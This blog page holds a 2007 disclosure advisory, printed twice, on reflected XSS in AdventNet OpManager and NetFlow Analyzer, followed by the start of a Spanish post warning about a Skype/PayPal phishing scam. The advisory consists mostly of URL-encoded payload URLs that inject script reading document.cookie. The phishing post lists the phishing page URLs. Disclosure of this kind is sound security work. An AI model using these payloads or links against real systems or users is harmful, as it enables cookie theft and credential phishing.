NetFlow Analizer 5 & OpManager 7 multiple XSS
Wednesday, July 04, 2007
###################################################
NetFlow Analizer 5 & OpManager 7 multiple XSS
vendor url:http://www.adventnet.com/
advisore:http://lostmon.blogspot.com/2007/07/
netflow-analizer-5-opmanager-7-multiple.html
vendor notify:yes exploits include:yes
Secunia:SA25947 SA20067,
BID:24767, 24766
SecWatch:SWID1018376, SWID1018377
###################################################
NetFlow Analizer and OpManager contains a flaw that allows
a remote cross site scripting attack. This flaw exists
because the application does not validate multiple params
upon submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
#####################
Versions afected:
#####################
OpManager 7
OpManager 6
NetFlow Analizer 5
other versions can be vulnerables too
###################
Solution:
###################
No solutions was available at this time !!!
##################
Time Line
##################
Discovered:20-05-2007
vendor notify:02-07-2007
vendor response:-----
disclosure:04-07-2007
###################
Examples
###################
for exploit some flaws you need to login.
#####################
OpManager
#####################
http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C
%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3
D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%
67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57
%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%7
2%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%
73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E
%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22
%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%
6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E
%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%
3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3
E%3C%2F%62%6F%64%79%3E
http://localhost:8080/devices/Search.do?searchTerm=sss%22%
3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3
C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F
%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selected
Tab=Map
http://localhost:8080/reports/ReportViewAction.do?selected
Tab=Reports&selectedNode=Server_Memory_Utilization&reportN
ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E
%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%
6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6
D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20
%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%
57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6
1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69
%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di
splayName=webclient.reports.servers.memutil
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_Memory_Utilization&reportNam
e=Utilization_Report&displayName=webclient.reports.servers.
memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62%
6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22
%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%7
3%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%
73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E
%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%6
3%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%
2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62
%6F%64%79%3E&reportName=Utilization_Report&displayName=webc
lient.reports.servers.cpuutil
http://localhost:8080/admin/ServiceConfiguration.do?operati
on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7
0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%
73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E
%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2
1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%
21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72
%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2
F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte
r&serviceName=Alerter
http://localhost:8080/admin/DeviceAssociation.do?selectedNo
de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D
%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3
E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63
%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa
me=com.adventnet.me.opmanager.webclient.admin.association.N
TServiceAssociation
http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConf
igurations
http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F
%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%6
8%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%
70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73
%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%5
8%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%
72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E
%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6
F%64%79%3E
#######################
NetFlow Analizer
#######################
http://localhost:8080/netflow/jspui/applicationList.jsp?alph
a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68
%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F
%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C
%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70
%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E
%3C%2F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modif
y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7
2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6
2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6
E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3
E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6
5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3
C%2F%62%6F%64%79%3E&appID=62
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=
ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%
6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%
6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%
3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%
74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=g
roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%
68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%
6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%
3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%
70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%
6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%
3E%3C%2F%62%6F%64%79%3E&grDisp=1
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=g
lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%
6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/customReport.jsp?rtype=gl
obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%
72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2
0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%
72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73
%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2
E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%
64%79%3E&period=hourly&customOption=true&firstTime=true
#################### €nd ################################
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
NetFlow Analizer 5 & OpManager 7 multiple XSS
vendor url:http://www.adventnet.com/
advisore:http://lostmon.blogspot.com/2007/07/
netflow-analizer-5-opmanager-7-multiple.html
vendor notify:yes exploits include:yes
Secunia:SA25947 SA20067,
BID:24767, 24766
SecWatch:SWID1018376, SWID1018377
###################################################
NetFlow Analizer and OpManager contains a flaw that allows
a remote cross site scripting attack. This flaw exists
because the application does not validate multiple params
upon submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.
#####################
Versions afected:
#####################
OpManager 7
OpManager 6
NetFlow Analizer 5
other versions can be vulnerables too
###################
Solution:
###################
No solutions was available at this time !!!
##################
Time Line
##################
Discovered:20-05-2007
vendor notify:02-07-2007
vendor response:-----
disclosure:04-07-2007
###################
Examples
###################
for exploit some flaws you need to login.
#####################
OpManager
#####################
http://localhost:8080/map/ping.do?name=192.168.1.2%22%3E%3C
%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3
D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%
67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57
%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%7
2%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%
73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E
%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/map/traceRoute.do?name=192.168.1.2%22
%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%
6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E
%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%
3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3
E%3C%2F%62%6F%64%79%3E
http://localhost:8080/devices/Search.do?searchTerm=sss%22%
3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%6
5%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3
C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F
%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3EE&requestid=SNAPSHOT&selected
Tab=Map
http://localhost:8080/reports/ReportViewAction.do?selected
Tab=Reports&selectedNode=Server_Memory_Utilization&reportN
ame=Utilization_Report%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E
%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%
6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6
D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20
%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%
57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%6
1%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69
%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3EE&di
splayName=webclient.reports.servers.memutil
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_Memory_Utilization&reportNam
e=Utilization_Report&displayName=webclient.reports.servers.
memutil%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E
http://localhost:8080/reports/ReportViewAction.do?selectedT
ab=Reports&selectedNode=Server_CPU_Utilization%22%3E%3C%62%
6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22
%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%7
3%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%
73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E
%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%6
3%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%
2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62
%6F%64%79%3E&reportName=Utilization_Report&displayName=webc
lient.reports.servers.cpuutil
http://localhost:8080/admin/ServiceConfiguration.do?operati
on=modifyNTService%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%7
0%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%
73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E
%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%2
1%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%
21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72
%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2
F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E&services=Alerte
r&serviceName=Alerter
http://localhost:8080/admin/DeviceAssociation.do?selectedNo
de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D
%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3
E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63
%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7
0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa
me=com.adventnet.me.opmanager.webclient.admin.association.N
TServiceAssociation
http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F
%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%7
4%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%
31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21
%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6
F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%
69%70%74%3E%3C%2F%62%6F%64%79%3E&selectedNode=NTServiceConf
igurations
http://localhost:8080/admin/DeviceAssociation.do?selectedTa
b=admin&selectedNode=NTServiceConfigurations%22%3E%3C%62%6F
%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%6
8%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%
70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73
%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%5
8%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%
72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E
%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6
F%64%79%3E
#######################
NetFlow Analizer
#######################
http://localhost:8080/netflow/jspui/applicationList.jsp?alph
a=A%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68
%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F
%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C
%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70
%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D
%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E
%3C%2F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modif
y%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%7
2%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%6
2%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6
E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3
E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%6
5%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3
C%2F%62%6F%64%79%3E&appID=62
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=
ipgroups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%
20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%
6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%
6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%
3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%
2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%
75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%
74%3E%3C%2F%62%6F%64%79%3E&grDisp=Todos%20los%20grupos
http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=g
roups%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%
68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%
2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%
6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%
3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%
70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%
6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%
3E%3C%2F%62%6F%64%79%3E&grDisp=1
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=g
lobal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6
8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E
%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%
6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2
F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%
6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2
F%62%6F%64%79%3E
http://localhost:8080/netflow/jspui/customReport.jsp?rtype=gl
obal%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%
72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62
%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%2
0%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%
72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73
%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2
E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%
64%79%3E&period=hourly&customOption=true&firstTime=true
#################### €nd ################################
Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Skype Phishing and other pay methoth Scam
Sunday, June 17, 2007
################################################
Skype Phishing and other pay methoth Scam
###############################################
Hoy me llego un correo solicitandome que actualizara
La informacion de mi cuenta de skype (sistema que no uso)

Es una nueva forma de hacerse con las contraseñas de los
incautos usuarios;pero esto va un poco mas lejos.
Si por desgracia accedemos a la web malefica:
http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/login.html

ademas de perder nuestra cuenta de skype tenemos mucho
mas que perder.pues la pagina malefica, ademas intentara
por medio de engaño hacerse con varias de nuestras
contraseñas o datos importantes de nuestras formas
de pago por internet.

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/c2.php
Nuestra cuenta de PayPal :

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/PayPal%20-%20Log%20In.htm
nuestra cuenta de MoneyBrookers

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
skype.com/5746464646/book1.htm

http://www.ac-amiens.fr/inspections/80/peronne/mobile/
